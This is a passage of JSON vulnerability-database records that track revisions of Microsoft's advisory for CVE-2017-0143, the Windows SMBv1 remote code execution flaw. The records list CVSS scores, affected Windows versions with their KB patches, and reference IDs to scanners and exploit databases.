8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T10:52:46", "differentElements": ["msAffectedSoftware"], "edition": 51}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-17T12:43:31", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB4012212", "KB3205409", "KB4012214", "KB4012606", "KB4012598", "KB3213986", "KB3205401", "KB4012217", "KB4012215", "KB3210720", "KB3210721", "KBMS16-110, 3187754", "KB4013429", "KB4012216", "KB3212646", "KB3177186", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T12:43:31", "differentElements": ["msAffectedSoftware"], "edition": 52}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-17T16:50:29", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB4012212", "KB3205409", "KB4012214", "KB4012606", "KB4012598", "KB3213986", "KB3205401", "KB4012217", "KB4012215", "KB3210720", "KB3210721", "KBMS16-110, 3187754", "KB4013429", "KB4012216", "KB3212646", "KB3177186", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 